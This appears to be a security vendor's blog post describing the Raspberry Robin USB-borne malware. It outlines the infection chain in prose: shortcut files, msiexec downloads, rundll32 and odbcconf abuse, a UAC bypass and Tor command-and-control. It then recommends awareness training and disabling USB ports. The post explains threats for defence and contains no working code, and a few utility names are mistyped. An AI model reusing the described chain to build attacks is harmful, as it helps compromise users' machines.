As if any well-minded cybersecurity professional would be trusting of the little buggers in the first place. Anywho, there’s a new malware making the rounds. It’s called Raspberry Robin and it lives almost exclusively on compromised USB drives.
The malware was first noticed in September of 2021 by the team over at Red Canary, a managed detection and response firm. According to researchers, the life cycle of Raspberry Robin is as follows:
- Infected USB drive attached – Raspberry Robin is typically introduced by infected removable drives – such as USB devices – containing a malicious .LINK file
- cmd.exe and misexec.exe commands – cmd.exe read and executes a malicious file stored on the infected device, then misiexec.exe attempts to connect to a short URL (often QNAP-associated)
- Malicious .DLL download – If the external misexec.exe connection is successful, it downloads and installs a malicious .DLL
- rundll32.exe and Windows utility misuse – rundll32.exe launches a legitimate Windows utility like odbcconf.exe to execute the malicious .DLL
- Ongoing command & control activity – regsvr32.exe, rundll32.exe, and dllhost.exe repeatedly attempt outbound network connections, typically to TOR nodes
What does that mean?
So, basically, Raspberry Robin lives on external drives, like USB drives, memory cards, whatnot. When they’re plugged into a windows machine they being a process of downloading a payload. After the payload is downloaded, the malware uses cmd.exe to execute it.
Raspberry Robin uses legitimate Windows utilities like fodhelper.exe, rundll32.exe to rundll32exe and odbcconf.exe to bypass the User Account Control (UAC).
Nobody’s sure what Raspberry Robin actually does yet, however. Upon installation, the malware reaches out to various nodes associated with Tor. Red Canary has been unable to decipher what happens next, if anything.
“We also don’t know why Raspberry Robin installs a malicious DLL,” the researchers said. “One hypothesis is that it may be an attempt to establish persistence on an infected system.”
How can you protect yourself?
The two things that come to mind first are these:
- Security Awareness Training
- Disable USB access on endpoints
Why Security Awareness Training?
A healthy cybersecurity posture can only be formed on a strong foundation, made up of the combined efforts of a cyber security-minded workforce. If the workforce is aware of the threats posed by plugging in a seemingly random USB drive found on a sidewalk outside your place of business, malware like Raspberry Robin can’t take hold in the first place.
No matter what you do, no matter what cybersecurity implementation you put in place, you’ll only ever be as strong as your weakest link. By educating the masses (so to speak) you’re bolstering every other cybersecurity endeavor you’re putting in place to keep the business safe. You’re closing gaps rather than opening them.
You can learn more about Security Awareness Training here: https://www.security7.net/solutions/managed-services/security-awareness-training
Why disable USB access on endpoints?
No matter what you do, there’s going to be one meathead in the organization who either forgets their security awareness training or didn’t care about security awareness training to begin with and likes to live life on the edge, plugging anything they find in immediately, just to see what’s on it.
If you disable USB access on your endpoints, no matter what the meathead does, they won’t be successful in their endeavor. In some cases, this might really be the only way to stop curiosity from killing that damn cat.
